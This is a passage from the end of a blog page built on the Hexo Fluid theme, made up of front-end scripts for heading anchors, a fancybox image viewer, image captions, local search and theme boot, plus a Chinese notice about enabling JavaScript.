      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
